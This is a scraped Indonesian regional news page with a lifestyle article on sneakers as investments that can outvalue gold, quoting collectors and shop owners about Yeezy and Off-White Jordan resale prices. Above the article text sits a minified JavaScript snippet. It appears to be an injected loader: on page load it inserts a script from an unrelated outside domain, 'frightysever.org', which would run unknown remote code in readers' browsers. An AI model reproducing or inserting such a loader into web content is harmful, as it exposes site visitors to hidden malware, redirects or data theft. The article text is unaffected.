(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
gaya hidup

Ini Alasannya Sneakers Bisa Berharga Lebih Mahal dari Emas


JAKARTA, Sneakers kini bukan hanya sekadar pelengkap gaya para milenial. Mereka yang menjadi sneakerhead atau kolektor sneakers bisa meraih keuntungan berlipat dengan menjual salah satu koleksi mereka tersebut. Sneakers sekarang ini sudah bisa menjadi barang investasi yang harganya dapat berkali-kali lebih mahal dari emas.

Riset yang dilakukan MyVoucherCodes (sebuah situs kupon diskon di Inggris), mengungkapkan, beberapa sneakers harganya bisa jauh lebih mahal dari emas. Dalam surveinya, MyVouchesCodes menganalisa 50 pasang sneakers yang dirilis setahun terakhir pada 2018. Berdasarkan survei tersebut diketahui, beberapa sneakers nilai jualnya jadi 60 kali lebih mahal dari harga awal. Salah satunya adalah sneakers Nike SB Dunk Low Reese Forbes Denims yang saat pertamakali dirilis pada 2002 harganya US$ 65 atau sekitar Rp 900 ribuan dan kini harganya mencapai US$ 4.000 atau sekitar Rp 56 juta.

Salah satu sneakerhead yang sudah merasakan untung dari menjual sneakers koleksinya adalah personel RAN, Rayi Putra. Rayi pernah memiliki sneakers yang memiliki nilai investasi tinggi. Sneakers tersebut adalah Nike Air Yeezy. Merek sepatu dari Kanye West ini sebelum berkolaborasi dengan Adidas, merilis koleksi perdananya bersama Nike.

“Sekarang kan Yeezy sama Adidas, dulu Kanye West sama Nike, dia punya Air Yeezy sama Nike. Waktu itu aku beli harga ritelnya Rp 3 juta kurang lebih segitu, terus aku jual Rp 12 juta,” kisah Rayi.

Kenapa sneakers bisa memiliki nilai investasi tinggi, bahkan lebih mahal dari emas atau berlian? Rayi mengatakan harga sneakers bisa melambung tinggi karena jumlah rilisnya yang sedikit.

“Karena untuk beberapa tipe sneakers jumlah rilisannya sedikit, tapi demand-nya tinggi sekali, jadi harga nya melambung. Selain itu ditambah faktor persepsi (hype) yang terbentuk oleh postingan media sosial selebriti dunia, membuat semakin banyak orang yang menginginkan sepatu tersebut,” ucap musisi yang pernah memiliki 150 pasang sneakers itu.

Salah satu pemilik toko sneakers di Jakarta, Liando juga mengungkapkan hal serupa. Sneakers yang harganya bisa melambung tinggi ketika sepatu tersebut dirilis dalam jumlah terbatas atau waktu tertentu saja. Sneakers jenis tersebut yang pernah dibeli Liando adalah kolaborasi Nike Air Jordan dengan brand Off-White. Sepatu Air Jordan 1 Off-White ini menurutnya hanya dirilis satu kali pada 2017.

“Jordan Chicago Off-White, dulu harga ritel Rp 2 juta, after marketnya jadi Rp 17 juta. Sekarang 2019, harganya sudah di angka Rp 80-90 juta bahkan ke depannya akan bisa tembus diangka Rp 100 juta. Ini supplnya sedikit, otomatis harganya semakin naik,” ucap Liando.

Hal sama dikatakan oleh Mochamad Arsyadham Lazuardi, pendiri dari event organizer acara bazaar sneakers, Indonesia Yesim Project. Menurutnya, sneakers yang semakin langka membuat harganya semakin mahal.

“Waktu itu sneakers pertama saya itu Adidas Yeezy Black Pirate yang dulu itu booming banget, awal pertama yang keluar itu kalau gak salah turtle black. Mulai booming banget kalau harga ritelnya itu sekitar Rp 3 juta. Sampai akhirnya saking ngeboomingnya sekarang Rp 20 jutaan untuk Black Pirate ini,” kata Syadham.

Eksklusifitas dari sneakers tersebut juga memengaruhi harga sneakers. Seperti sneakers Yeezy menurut Syadham yang hanya dijual di toko-toko tertentu.

“Jadi karena memang stocknya sedikit, kalau Yeezy kan nggak dijual distorenya Adidas, cuman dijual di toko ritelnya doang. Nah, jadi emang gitu sih yang bikin dia mahal itu karena rarenya. Soalnya banyak banget sepatu yang lebih nyaman dan harganya di bawah ini,” tutupnya.(gaf/eny)

Reporter : gaf/eny
Editor : Cell

 


Desy Arfianty

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

15 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

17 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

17 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

18 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

22 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

1 hari ago

This website uses cookies.